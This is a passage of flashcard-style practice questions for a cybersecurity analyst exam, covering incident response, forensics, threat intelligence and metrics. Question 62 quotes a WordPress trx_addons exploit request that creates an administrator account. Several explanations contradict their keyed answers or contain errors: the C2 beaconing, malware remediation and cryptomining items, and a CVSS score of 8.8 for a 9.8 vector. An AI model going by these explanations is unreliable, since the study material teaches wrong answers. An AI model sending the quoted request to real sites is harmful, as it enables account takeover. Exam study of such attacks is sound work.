A. Upload the binary to an air gapped sandbox for analysis
B. Send the binaries to the antivirus vendor
C. Execute the binaries on an environment with internet connectivity
D. Query the file hashes using VirusTotal

A

Correct Answer: A

This approach allows the analyst to analyze the binaries without exposing them to the internet, ensuring that no information is inadvertently revealed to the attackers.

By using an air-gapped environment, the analyst can safely examine the malware’s behavior and characteristics while maintaining confidentiality.

The other options (sending binaries to an antivirus vendor, executing them in an internet-connected environment, or querying file hashes using VirusTotal) may inadvertently leak information or compromise the investigation.

So, option A is the most suitable choice in this scenario.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
40
Q

Which of the following is the best way to begin preparation for a report titled “What We Learned” regarding a recent incident involving a cybersecurity breach?

A. Determine the sophistication of the audience that the report is meant for
B. Include references and sources of information on the first page
C. Include a table of contents outlining the entire report
D. Decide on the color scheme that will effectively communicate the metrics

A

Correct Answer: A

Understanding your audience’s level of expertise and familiarity with cybersecurity concepts will help tailor the content appropriately. Once you have that clarity, you can proceed with creating an effective report.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
41
Q

Which of the following would help to minimize human engagement and aid in process improvement in security operations?

A. OSSTMM
B. SIEM
C. SOAR
D. OWASP

A

Correct Answer: C

SOAR (Security Orchestration, Automation, and Response) provides automation, orchestration, and predictive capabilities to strengthen security operations and reduce reliance on manual processes. It’s a powerful tool for minimizing human engagement and improving efficiency

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
42
Q

Which of the following is an important aspect that should be included in the lessons-learned step after an incident?

A. Identify any improvements or changes in the incident response plan or procedures
B. Determine if an internal mistake was made and who did it so they do not repeat the error
C. Present all legal evidence collected and turn it over to law enforcement
D. Discuss the financial impact of the incident to determine if security controls are well spent

A

Correct Answer: A

A. This is crucial. After an incident, it’s essential to evaluate what went well and what could be improved. Adjustments to the incident response plan or procedures can enhance future incident handling.

B. While identifying internal mistakes is important, the primary focus should be on learning and preventing recurrence rather than assigning blame. Understanding the root cause helps prevent similar errors.

C. This step is relevant for legal and law enforcement purposes. It ensures that evidence is properly documented and handed over to the appropriate authorities.

D. While financial impact assessment is valuable, it’s not typically part of the lessons-learned process. However, it’s essential for overall security management.

The most relevant choice for the lessons-learned step is option A. Identifying improvements and changes ensures continuous improvement in incident response.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
43
Q

After conducting a cybersecurity risk assessment for a new software request, a Chief Information Security Officer (CISO) decided the risk score would be too high. The CISO refused the software request. Which of the following risk management principles did the CISO select?

A. Avoid
B. Transfer
C. Accept
D. Mitigate

A

Correct Answer: A

The Chief Information Security Officer (CISO) in this scenario selected the “Avoid” risk management principle. By refusing the software request due to a high risk score, the CISO is actively avoiding the potential risks associated with implementing the software.

Other risk management principles include transferring (such as through insurance or outsourcing), accepting (acknowledging and managing the risk), and mitigating (reducing the impact of the risk).

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
44
Q

The security operations team is required to consolidate several threat intelligence feeds due to redundant tools and portals. Which of the following will best achieve the goal and maximize results?

A. Single pane of glass
B. Single sign-on
C. Data enrichment
D. Deduplication

A

Correct Answer: A

Single Pane of Glass (SPOG): This concept refers to a unified dashboard or interface that aggregates information from various sources into a single view. By using a SPOG, your security operations team can access and analyze threat intelligence data from multiple feeds without switching between different tools or portals. It streamlines workflows, reduces redundancy, and enhances efficiency.

Benefits:
Centralized View: All threat data is accessible in one place, making it easier to correlate and prioritize incidents.

Reduced Complexity: No need to manage multiple interfaces or logins.

Improved Decision-Making: Analysts can quickly identify patterns and respond to threats more effectively.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
45
Q

Which of the following would a security analyst most likely use to compare TTPs between different known adversaries of an organization?

A. MITRE ATT&CK
B. Cyber Kill Cham
C. OWASP
D. STIX/TAXI

A

Correct Answer: A

A security analyst would most likely use MITRE ATT&CK for comparing Tactics, Techniques, and Procedures (TTPs) between different known adversaries of an organization.

MITRE refers to the organization that developed this framework. The acronym ATT&CK stands for Adversarial Tactics, Techniques & Common Knowledge. It reflects the focus of the framework: understanding.

MITRE ATT&CK is a comprehensive framework that provides a detailed matrix of adversary behaviors across various stages of the attack lifecycle. It helps analysts understand and compare the techniques used by threat actors, aiding in threat intelligence, incident response, and vulnerability management.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
46
Q

An analyst is remediating items associated with a recent incident. The analyst has isolated the vulnerability and is actively removing it from the system. Which of the following steps of the process does this describe?

A. Eradication
B. Recovery
C. Containment
D. Preparation

A

Correct Answer: A

The step that describes the analyst actively removing the vulnerability from the system is A. Eradication.

During this phase, the focus is on completely eliminating the threat or vulnerability to prevent it from causing further harm. Once eradication is complete, the system can move toward recovery and restoration.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
47
Q

Joe, a leading sales person at an organization, has announced on social media that he is leaving his current role to start a new company that will compete with his current employer. Joe is soliciting his current employer’s customers. However, Joe has not resigned or discussed this with his current supervisor yet. Which of the following would be the best action for the incident response team to recommend?

A. Isolate Joe’s PC from the network
B. Reimage the PC based on standard operating procedures
C. Initiate a remote wipe of Joe’s PC using mobile device management
D. Perform no action until HR or legal counsel advises on next steps

A

Correct Answer: D

Legal Considerations: Joe’s actions may have legal implications, especially if he’s soliciting customers while still employed. It’s essential to consult with legal counsel to determine the appropriate course of action.

HR Involvement: HR should be informed promptly. They can guide the organization on how to handle the situation, including any necessary disciplinary actions or termination procedures.

Preserving Evidence: Isolating Joe’s PC or wiping it remotely could inadvertently destroy evidence that might be relevant in any future legal proceedings. It’s best to wait for professional advice.

Incident response should always be coordinated with legal and HR departments to ensure compliance and protect the organization’s interests.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
48
Q

The Chief Information Security Officer is directing a new program to reduce attack surface risks and threats as part of a zero trust approach. The IT security team is required to come up with priorities for the program. Which of the following is the best priority based on common attack frameworks?

A. Reduce the administrator and privileged access accounts
B. Employ a network-based IDS
C. Conduct thorough incident response
D. Enable SSO to enterprise applications

A

Correct Answer: A

These accounts often have elevated permissions and are attractive targets for attackers. By minimizing their numbers and ensuring strict access controls, organizations can significantly enhance security.

While the other options are important, they may not directly address the attack surface reduction as effectively as limiting privileged accounts.

For instance:

Employing a network-based IDS (Option B) helps detect and respond to network-based attacks, but it doesn’t directly reduce the attack surface.

Conducting thorough incident response (Option C) is crucial, but it’s reactive rather than preventive.

Enabling SSO to enterprise applications (Option D) improves user experience but doesn’t inherently reduce the attack surface.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
49
Q

During an extended holiday break, a company suffered a security incident. This information was properly relayed to appropriate personnel in a timely manner and the server was up to date and configured with appropriate auditing and logging. The Chief Information Security Officer wants to find out precisely what happened. Which of the following actions should the analyst take first?

A. Clone the virtual server for forensic analysis
B. Log m to the affected server and begin analysis of the logs
C. Restore from the last known-good backup to confirm there was no loss of connectivity
D. Shut down the affected server immediately

A

Correct Answer: A

Creating a clone of the affected server ensures that the original system remains untouched during the investigation. The cloned server can be analyzed for evidence without risking further damage or data loss. This step aligns with the preservation phase of incident response, where maintaining the integrity of potential evidence is crucial.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
50
Q

A systems administrator is reviewing after-hours traffic flows from data-center servers and sees regular outgoing HTTPS connections from one of the servers to a public IP address. The server should not be making outgoing connections after hours. Looking closer, the administrator sees this traffic pattern around the clock during work hours as well. Which of the following is the most likely explanation?

A. C2 beaconing activity
B. Data exfiltration
C. Anomalous activity on unexpected ports
D. Network host IP address scanning
E. A rogue network device

A

Correct Answer: A

Considering the information provided, the most likely explanation is C2 beaconing activity (A). Although it’s unusual for C2 traffic to occur continuously during work hours, it’s essential to investigate further to confirm the cause. Additionally, consider checking for compromised software or malware on the server.

C2 Beaconing Activity (A): Command-and-control (C2) beaconing typically involves periodic communication from an infected host to a remote server controlled by an attacker. However, the consistent traffic pattern around the clock during work hours suggests that this is unlikely, as C2 activity usually occurs intermittently or at specific intervals.

Data Exfiltration (B): Data exfiltration involves unauthorized transfer of sensitive information from an internal network to an external location. While this could be a possibility, the continuous traffic pattern both during and after work hours doesn’t align with typical exfiltration behavior.

Anomalous Activity on Unexpected Ports (C): This option refers to unusual traffic on non-standard ports. While it’s essential to investigate further, the fact that the traffic occurs consistently during work hours makes it less likely to be an anomaly.

Network Host IP Address Scanning (D): Scanning activity involves probing other hosts or networks for vulnerabilities. However, if the server is initiating these connections, it’s less likely to be scanning other hosts. Scanning activity is usually inbound, not outbound.

A Rogue Network Device (E): A rogue network device, such as an unauthorized router or switch, could cause unexpected traffic patterns. However, this explanation seems less probable given the consistent behavior during work hours.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
51
Q

New employees in an organization have been consistently plugging in personal webcams despite the company policy prohibiting use of personal devices. The SOC manager discovers that new employees are not aware of the company policy. Which of the following will the SOC manager most likely recommend to help ensure new employees are accountable for following the company policy?

A. Human resources must email a copy of a user agreement to all new employees
B. Supervisors must get verbal confirmation from new employees indicating they have read the user agreement
C. All new employees must take a test about the company security policy during the onboardmg process
D. All new employees must sign a user agreement to acknowledge the company security policy

A

Correct Answer: D

Given the situation, the SOC manager would likely recommend option D: All new employees must sign a user agreement to acknowledge the company security policy.

User Agreement: Having new employees sign a user agreement explicitly acknowledges their awareness of company policies. This creates a formal record and ensures accountability.

Verbal Confirmation (Option B): Relying solely on verbal confirmation may not be sufficient, as it lacks a documented record. Verbal agreements can be easily forgotten or misunderstood.

Emailing a Copy (Option A): While sending an email with the policy is helpful, it doesn’t guarantee that employees will read and understand it thoroughly.

Taking a Test (Option C): While testing knowledge is valuable, it might be time-consuming and may not be practical during the onboarding process.

By having new employees sign a user agreement, the organization establishes a lear understanding of the policy and ensures compliance. Additionally, periodic reminders and training sessions can reinforce policy awareness.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
52
Q

An analyst has been asked to validate the potential risk of a new ransomware campaign that the Chief Financial Officer read about in the newspaper. The company is a manufacturer of a very small spring used in the newest fighter jet and is a critical piece of the supply chain for this aircraft. Which of the following would be the best threat intelligence source to learn about this new campaign?

A. Information sharing organization
B. Blogs/forums
C. Cybersecurity incident response team
D. Deep/dark web

A

Correct Answer: A

Given the critical nature of the company’s supply chain and the potential impact of a ransomware attack, the best threat intelligence source to learn about this new campaign would be information sharing organizations.

These organizations aggregate and disseminate timely threat intelligence, often collaborating with industry experts, government agencies, and other security professionals.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
53
Q

An incident response team finished responding to a significant security incident. The management team has asked the lead analyst to provide an after-action report that includes lessons learned. Which of the following is the most likely reason to include lessons learned?

A. To satisfy regulatory requirements for incident reporting
B. To hold other departments accountable
C. To identify areas of improvement in the incident response process
D. To highlight the notable practices of the organization’s incident response team

A

Correct Answer: C

The most likely reason to include lessons learned in an after-action report is C.

To identify areas of improvement in the incident response process. By analyzing what went well and what could be improved during the incident response, organizations can enhance their security posture, refine their processes, and better prepare for future incidents.

While satisfying regulatory requirements (option A) is important, the primary focus of lessons learned is on process improvement rather than compliance.

Holding other departments accountable (option B) and highlighting notable practices (option D) are secondary considerations compared to learning from the incident to prevent recurrence.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
54
Q

A user downloads software that contains malware onto a computer that eventually infects numerous other systems. Which of the following has the user become?

A. Hacktivist
B. Advanced persistent threat
C. Insider threat
D. Script kiddie

A

Correct Answer: C

The user in this scenario has become a C. Insider threat. An insider threat refers to someone within an organization who misuses their access or privileges to intentionally or unintentionally cause harm to the organization’s security, data, or systems. In this case, the user’s actions of downloading and spreading malware would fall under the category of insider threat.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
55
Q

During an incident, an analyst needs to acquire evidence for later investigation. Which of the following must be collected first in a computer system, related to its volatility level?

A. Disk contents
B. Backup data
C. Temporary files
D. Running processes

A

Correct Answer: D

When collecting evidence during an incident, the order of volatility is crucial. Analysts should prioritize running processes first, as they are the most volatile and can change rapidly. After that, they can proceed to collect other data such as temporary files, disk contents, and backup data. So the correct answer is D. Running processes.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
56
Q

An organization has activated the CSIRT. A security analyst believes a single virtual server was compromised and immediately isolated from the network. Which of the following should the CSIRT conduct next?

A. Take a snapshot of the compromised server and verify its integrity
B. Restore the affected server to remove any malware
C. Contact the appropriate government agency to investigate
D. Research the malware strain to perform attribution

A

Correct Answer: A

Given the situation, the CSIRT should prioritize the following actions:

Take a snapshot of the compromised server and verify its integrity (Option A): Creating a snapshot allows for forensic analysis without altering the original state. Verifying integrity ensures that the snapshot accurately represents the compromised system.

Research the malware strain to perform attribution (Option D): Understanding the malware helps identify the threat actor, their motives, and potential impact. This information informs incident response and future prevention measures.

Restore the affected server (Option B): After analysis, if the server is deemed safe, restoring it ensures business continuity. However, this step should follow snapshot creation and integrity verification.

Contacting government agencies (Option C): While important for certain incidents (e.g., nation-state attacks), it’s not the immediate next step. Focus on technical investigation first.

Remember, confidentiality and thorough analysis are critical. Availability can be restored later once security is assured.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
57
Q

A security analyst is writing a shell script to identify IP addresses from the same country.

Which of the following functions would help the analyst achieve the objective?

A. function w() { info=$(ping -c 1 $1 | awk -F “/” ‘END{print $1}’) && echo “$1 | $info” }

B. function x() { info=$(geoiplookup $1) && echo “$1 | $info” }

C. function y() { info=$(dig -x $1 | grep PTR | tail -n 1 ) && echo “$1 | $info” }

D. function z() { info=$(traceroute -m 40 $1 | awk ‘END{print $1}’) && echo “$1 | $info” }

A

Correct Answer: B

To identify IP addresses from the same country, the most relevant function is B. function x(). Let’s break down why:

Function w() uses ping to measure round-trip time to a host, but it doesn’t provide country information.
Function y() performs a reverse DNS lookup (dig -x) and extracts the PTR record, but this doesn’t directly give country details.
Function z() traces the route to a host, but it doesn’t focus on country information.
Now, let’s look at Function x():

function x() {
info=$(geoiplookup $1)
echo “$1 | $info”
}

This function uses the geoiplookup command, which queries a GeoIP database to determine the country associated with an IP address. It’s the most suitable choice for your objective.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
58
Q

A security analyst is trying to identify possible network addresses from different source networks belonging to the same company and region.

Which of the following shell script functions could help achieve the goal?

A. function w() { a=$(ping -c 1 $1 | awk-F ”/” ’END{print $1}’) && echo “$1 | $a” }

B. function x() { b=traceroute -m 40 $1 | awk ’END{print $1}’) && echo “$1 | $b” }

C. function y() { dig $(dig -x $1 | grep PTR | tail -n 1 | awk -F ”.in-addr” ’{print $1}’).origin.asn.cymru.com TXT +short }

D. function z() { c=$(geoiplookup$1) && echo “$1 | $c” }

A

Correct Answer: C

The shell script function that could help identify possible network addresses from different source networks belonging to the same company and region is function y. Here’s how it works:

function y() {
dig $(dig -x $1 | grep PTR | tail -n 1 | awk -F “.in-addr” ‘{print $1}’).origin.asn.cymru.com TXT +short
}

This function takes an IP address as an argument and performs two DNS lookups using the dig command. It retrieves information related to the address, including its origin and Autonomous System Number (ASN). The output provides valuable context for identifying network addresses within the same company and regio

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
59
Q

While reviewing web server logs, an analyst notices several entries with the same time stamps, but all contain odd characters in the request line. Which of the following steps should be taken next?

A. Shut the network down immediately and call the next person in the chain of command.
B. Determine what attack the odd characters are indicative of.
C. Utilize the correct attack framework and determine what the incident response will consist of.
D. Notify the local law enforcement for incident response.

A

Correct Answer: B

Shutting down the network immediately might be an overreaction at this point. Investigate further before taking such drastic action.

Utilizing the correct attack framework (Option C) is a good approach, but first, you need to identify the type of attack.

Notifying local law enforcement (Option D) is premature. Law enforcement typically gets involved after a thorough assessment.

Focus on analyzing the odd characters in the request line. Look for patterns, research known attack techniques, and consider using threat intelligence sources to identify the specific attack. Once you have more information, proceed with incident response accordingly.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
60
Q

A security team conducts a lessons-learned meeting after struggling to determine who should conduct the next steps following a security event. Which of the following should the team create to address this issue?

A. Service-level agreement
B. Change management plan
C. Incident response plan
D. Memorandum of understanding

A

Correct Answer: C

The security team should create an Incident Response Plan (IRP) to address this issue. An IRP outlines the procedures, roles, and responsibilities for handling security incidents. It ensures a coordinated and effective response, including identifying who should take specific actions during and after an incident. The IRP helps streamline decision-making and ensures that the right individuals are involved in the next steps.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
61
Q

A cybersecurity analyst notices unusual network scanning activity coming from a country that the company does not do business with. Which of the following is the best mitigation technique?

A. Geoblock the offending source country.
B. Block the IP range of the scans at the network firewall.
C. Perform a historical trend analysis and look for similar scanning activity.
D. Block the specific IP address of the scans at the network firewall.

A

Correct Answer: B

Given the situation, the best mitigation technique would be B. Block the IP range of the scans at the network firewall.

Geoblocking (option A) might seem like a straightforward solution, but it can have unintended consequences. Blocking an entire country could inadvertently affect legitimate traffic or hinder business operations if there are any legitimate connections from that country.

Blocking the specific IP address (option D) is reactive and may not prevent other scanners from using different IP addresses. It’s better to address the broader range of IPs involved in the scanning activity.

Performing historical trend analysis (option C) is valuable for understanding the context and identifying patterns, but it won’t immediately stop the ongoing scanning activity.

Blocking the IP range of the scans at the network firewall (option B) is a targeted approach. By doing so, you can prevent further scanning attempts from that specific range without affecting other legitimate traffic.

Remember that timely incident response and continuous monitoring are crucial in cybersecurity. Regularly reviewing logs, analyzing threat intelligence, and staying informed about emerging threats will help you proactively address security incidents.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
62
Q

An analyst has received an IPS event notification from the SIEM stating an IP address, which is known to be malicious, has attempted to exploit a zero-day vulnerability on several web servers. The exploit contained the following snippet:

/wp-json/trx_addons/V2/get/sc_layout?sc=wp_insert_user&role=administrator

Which of the following controls would work best to mitigate the attack represented by this snippet?

A. Limit user creation to administrators only.
B. Limit layout creation to administrators only.
C. Set the directory trx_addons to read only for all users.
D. Set the directory V2 to read only for all users.

A

Correct Answer: A

The snippet provided appears to be an attempt to exploit a WordPress vulnerability.
The /wp-json/trx_addons/V2/get/sc_layout part indicates an endpoint in the WordPress REST API.
The sc=wp_insert_user&role=administrator query parameters suggest an attempt to create a new user with the “administrator” role.

A. Limit user creation to administrators only:
This control restricts user creation to administrators, which is a good practice. Tt won’t directly address the specific vulnerability in the snippet, it does However mitigate the specific attack.

B. Limit layout creation to administrators only:
Layout creation doesn’t seem relevant to the snippet. It’s unlikely to mitigate the attack.

C. Set the directory trx_addons to read-only for all users:
This option is more specific to the vulnerability. If the trx_addons directory contains sensitive files or scripts, setting it to read-only could prevent unauthorized modifications, but making the change to Read Only for All Users would prevent authentic Administrator write permissions as well.

D. Set the directory V2 to read-only for all users:
The V2 directory isn’t directly related to the snippet. Focusing on the trx_addons directory is more appropriate.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
63
Q

A penetration tester submitted data to a form in a web application, which enabled the penetration tester to retrieve user credentials. Which of the following should be recommended for remediation of this application vulnerability?

A. Implementing multifactor authentication on the server OS
B. Hashing user passwords on the web application
C. Performing input validation before allowing submission
D. Segmenting the network between the users and the web server

A

Correct Answer: C

*Input Validation: Ensuring that user inputs are properly validated before processing them is crucial. By validating input data, you can prevent malicious payloads from being submitted. Common techniques include:
* Whitelisting: Only allowing specific characters or patterns (e.g., alphanumeric characters) in input fields.
* Blacklisting: Explicitly blocking known malicious inputs (e.g., SQL injection strings).
* Regular Expressions (Regex): Using regex patterns to validate input (e.g., email addresses, phone numbers).

Hashing User Passwords: While hashing passwords is essential for security, it doesn’t directly address the issue of input validation. Hashing ensures that even if an attacker gains access to the password database, they won’t see plaintext passwords. However, it doesn’t prevent the initial vulnerability.

Multifactor Authentication (MFA): MFA adds an extra layer of security by requiring users to provide additional proof of identity (e.g., a one-time code sent to their phone). While MFA is important, it doesn’t directly address the vulnerability described in the scenario.

Network Segmentation: Segmenting the network between users and the web server is a good practice for overall security, but it doesn’t specifically address the vulnerability related to input validation.

In summary, input validation helps prevent malicious data from being processed, making it the most relevant recommendation in this context.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
64
Q

A cybersecurity team lead is developing metrics to present in the weekly executive briefs. Executives are interested in knowing how long it takes to stop the spread of malware that enters the network. Which of the following metrics should the team lead include in the briefs?

A. Mean time between failures
B. Mean time to detect
C. Mean time to remediate
D. Mean time to contain

A

Correct Answer: D

Mean Time to Contain (MTTC) measures the average time it takes to isolate and control a security incident after its initial detection. It focuses on the critical period between detection and containment, which directly impacts the spread of malware within the network.

Mean Time to Detect (MTTD), on the other hand, measures the average time it takes to identify a security incident. While important, MTTD alone doesn’t account for the containment effort.

Mean Time to Remediate (MTTR) measures the average time it takes to fully remediate an incident after detection. While relevant, it doesn’t specifically address containment speed.

Therefore, including MTTC in the executive briefs provides a clear indicator of the organization’s ability to swiftly contain and mitigate security incidents, minimizing their impact on critical systems.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
65
Q

An employee accessed a website that caused a device to become infected with invasive malware. The incident response analyst has:

  • created the initial evidence log.
  • disabled the wireless adapter on the device.
  • interviewed the employee, who was unable to identify the website that was accessed.
  • reviewed the web proxy traffic logs.

Which of the following should the analyst do to remediate the infected device?

A. Update the system firmware and reimage the hardware.
B. Install an additional malware scanner that will send email alerts to the analyst.
C. Configure the system to use a proxy server for Internet access.
D. Delete the user profile and restore data from backup.

A

Correct Answer: A

Given the options, the most relevant action is C. Configure the system to use a proxy server for Internet access. This step can help monitor and filter traffic, preventing future infections.

To effectively remediate the infected device, the incident response analyst should follow these steps:

Isolate the Device: Disable network access for the infected endpoint to prevent lateral movement. This step helps contain the malware and prevent further spread.

Identify the Type, Scope, and Timeline of the Malware Infection: Understand the nature of the malware, its impact, and when it occurred. This information informs subsequent actions.

Create an Image of the Infected System: Before making any changes, create a forensic image of the compromised system. This preserves evidence for further analysis and legal purposes.

Remove the Malware (if possible): Use reliable malware scanning and detection tools to identify and remove the malicious software. Ensure that the removal process doesn’t inadvertently cause data loss or further damage.

Reset Credentials and Invalidate Sessions: Change passwords and usernames associated with the infected device. Invalidate any active web sessions to prevent unauthorized access.

Review Access to Impacted Applications: Assess which applications or services were accessed from the infected device. Close any potential entry points used by the malware.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
66
Q

A cloud team received an alert that unauthorized resources were being auto-provisioned. After investigating, the team suspects that cryptomining is occurring. Which of the following indicators would most likely lead the team to this conclusion?

A. High GPU utilization
B. Bandwidth consumption
C. Unauthorized changes
D. Unusual traffic spikes

A

Correct Answer: A

The most likely indicator that cryptomining is occurring would be high CPU usage. When systems are hijacked for cryptojacking, they use the stolen compute resources to mine cryptocurrency in the background. Victims might notice slower performance, lags in execution, overheating, excessive power consumption, or unusually high cloud computing bills. While other indicators like bandwidth consumption and unusual traffic spikes could be relevant, high CPU usage is a stronger signal in this context. Keep an eye out for consistent and abnormal CPU utilization across resources or groups of cloud resources.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
67
Q

A company’s security team is updating a section of the reporting policy that pertains to inappropriate use of resources (e.g., an employee who installs cryptominers on workstations in the office). Besides the security team, which of the following groups should the issue be escalated to first in order to comply with industry best practices?

A. Help desk
B. Law enforcement
C. Legal department
D. Board member

A

Correct Answer: C

Legal Implications: The legal department is responsible for ensuring that the company complies with all relevant laws, regulations, and policies. Inappropriate use of resources can have legal implications, and the legal team can provide guidance on how to handle such situations within the bounds of the law.

Policy Enforcement: The legal department plays a crucial role in enforcing company policies. They can advise on the appropriate steps to take, including any disciplinary actions or legal consequences.

Risk Mitigation: Escalating the issue to the legal department helps mitigate risks associated with inappropriate resource use. They can assess the severity of the incident, evaluate potential liabilities, and recommend appropriate actions.

While the help desk, law enforcement, and board members may be involved at later stages, the legal department should be the initial point of escalation to ensure compliance with legal requirements and company policies. Keep in mind that industry best practices may vary, but involving legal experts early on is generally advisable.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
68
Q

Given the following CVSS string:

CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Which of the following attributes correctly describes this vulnerability?

A. A user is required to exploit this vulnerability.
B. The vulnerability is network based.
C. The vulnerability does not affect confidentiality.
D. The complexity to exploit the vulnerability is high.

A

Correct Answer: B

The CVSS string provided corresponds to a vulnerability with the following attributes:

Base Score: 8.8 (High severity)
Attack Vector (AV): Network (AV:N)
Attack Complexity (AC): Low (AC:L)
Privileges Required (PR): None (PR:N)
User Interaction (UI): None (UI:N)
Scope (S): Unchanged (S:U)
Confidentiality Impact ©: High (C:H)
Integrity Impact (I): High (I:H)
Availability Impact (A): High (A:H)

B. The vulnerability is network based.

Option A is incorrect: Privileges Required (PR): None (PR:N)
Option C is incorrect: Confidentiality Impact (C): High (C:H)
Option D is incorrect: Attack Complexity (AC): Low (AC:L)

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
69
Q

Which of the following best describes the goal of a tabletop exercise?

A. To test possible incident scenarios and how to react properly
B. To perform attack exercises to check response effectiveness
C. To understand existing threat actors and how to replicate their techniques
D. To check the effectiveness of the business continuity plan

A

Correct Answer: A

The goal of a tabletop exercise is A. To test possible incident scenarios and how to react properly. These exercises simulate various security incidents, allowing participants to discuss and practice their response strategies, identify gaps, and improve incident handling procedures. They are valuable for enhancing preparedness and coordination within an organization.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
70
Q

A security analyst must preserve a system hard drive that was involved in a litigation request. Which of the following is the best method to ensure the data on the device is not modified?

A. Generate a hash value and make a backup image.
B. Encrypt the device to ensure confidentiality of the data.
C. Protect the device with a complex password.
D. Perform a memory scan dump to collect residual data

A

Correct Answer: A

Hash Value and Backup Image:
* Generating a hash value (such as MD5, SHA-256, etc.) ensures data integrity. By calculating a hash of the original hard drive, you create a unique fingerprint that represents the entire content.
* Making a backup image (also known as a forensic image) involves creating a bit-for-bit copy of the hard drive. This image can be used for analysis without altering the original data.
* The hash value of the original drive and the backup image should match if no modifications occur during the preservation process.

Other Options:
B. Encrypt the device: Encryption ensures confidentiality but doesn’t prevent modification.
C. Protect with a complex password: A password protects access but doesn’t prevent data alteration.
D. Perform a memory scan dump: This collects volatile memory data, not the entire hard drive content.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
71
Q

A virtual web server in a server pool was infected with malware after an analyst used the internet to research a system issue. After the server was rebuilt and added back into the server pool, users reported issues with the website, indicating the site could not be trusted. Which of the following is the most likely cause of the server issue?

A. The server was configured to use SSL to securely transmit data.
B. The server was supporting weak TLS protocols for client connections.
C. The malware infected all the web servers in the pool.
D. The digital certificate on the web server was self-signed.

A

Correct Answer: D

A. The server was configured to use SSL to securely transmit data.
While SSL (Secure Sockets Layer) is essential for secure data transmission, it doesn’t directly impact trust issues reported by users. SSL ensures encryption, but it doesn’t address trustworthiness concerns.

B. The server was supporting weak TLS protocols for client connections.
Weak TLS (Transport Layer Security) protocols can indeed affect trust. If the server supports outdated or insecure TLS versions (e.g., TLS 1.0 or 1.1), it could compromise security and lead to trust issues.

C. The malware infected all the web servers in the pool.
Malware could certainly cause trust issues, but it’s not necessarily the most likely cause. We need more evidence to confirm this.

D. The digital certificate on the web server was self-signed.
This is a strong possibility. Self-signed certificates are not issued by a trusted certificate authority (CA), leading to trust warnings in browsers. Users might perceive the site as untrustworthy due to the self-signed certificate.

Conclusion: The most likely cause of the trust issue is option D—the self-signed digital certificate on the web server.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
72
Q

A security analyst needs to ensure that systems across the organization are protected based on the sensitivity of the content each system hosts. The analyst is working with the respective system owners to help determine the best methodology that seeks to promote confidentiality, availability, and integrity of the data being hosted. Which of the following should the security analyst perform first to categorize and prioritize the respective systems?

A. Interview the users who access these systems.
B. Scan the systems to see which vulnerabilities currently exist.
C. Configure alerts for vendor-specific zero-day exploits.
D. Determine the asset value of each system.

A

Correct Answer: D

Prioritizing systems based on their asset value is a crucial step in effective risk management and security planning. Let’s break down why this is the best approach:

Asset Valuation: Understanding the value of each system helps the security analyst assess its importance to the organization. Some systems may host critical data (e.g., customer records, financial information), while others may be less significant. By determining asset value, the analyst can allocate resources appropriately.

Risk Assessment: High-value assets are typically more attractive targets for attackers. By prioritizing them, the analyst can focus on protecting what matters most. This aligns with the organization’s overall risk management strategy.

Business Impact: The impact of a security incident on business operations depends on the affected system’s value. For example:
* A breach of a customer database could lead to reputational damage, legal consequences, and financial losses.
* An internal collaboration tool being compromised might have less severe consequences.

Compliance Requirements: Asset valuation also helps meet compliance requirements. Regulations often mandate protection of specific types of data (e.g., personal information, health records). Prioritizing high-value assets ensures compliance with relevant standards.
While interviewing users and scanning for vulnerabilities are essential tasks, determining asset value provides the foundational context for effective security decision-making. Once the analyst knows which systems are critical, they can proceed with vulnerability assessments, user interviews, and other risk management activities.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
73
Q

Which of the following best describes the document that defines the expectation to network customers that patching will only occur between 2:00 a.m. and 4:00 a.m.?

A. SLA
B. LOI
C. MOU
D. KPI

A

Correct Answer: A

The document that defines the expectation for network customers regarding patching during specific hours (between 2:00 a.m. and 4:00 a.m.) is typically an SLA (Service Level Agreement). SLAs outline the agreed-upon service levels, including maintenance windows, response times, and other performance metrics. It ensures alignment between service providers and customers.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
74
Q

A SOC analyst identifies the following content while examining the output of a debugger command over a client-server application:

getConnection(database01,”alpha” ,”AxTv.127GdCx94GTd”);

Which of the following is the most likely vulnerability in this system?

A. Lack of input validation
B. SQL injection
C. Hard-coded credential
D. Buffer overflow

A

Correct Answer: C

The most likely vulnerability in this system is C. Hard-coded credential.

The presence of the hardcoded username (“alpha”) and password (“AxTv.127GdCx94GTd”) within the getConnection function call indicates that sensitive credentials are directly embedded in the code.

This practice poses a significant security risk, as anyone with access to the code can easily extract these credentials and potentially gain unauthorized access to the database.

To improve security, it’s essential to use secure credential management practices, such as storing credentials in a separate, encrypted configuration file or using environment variables.

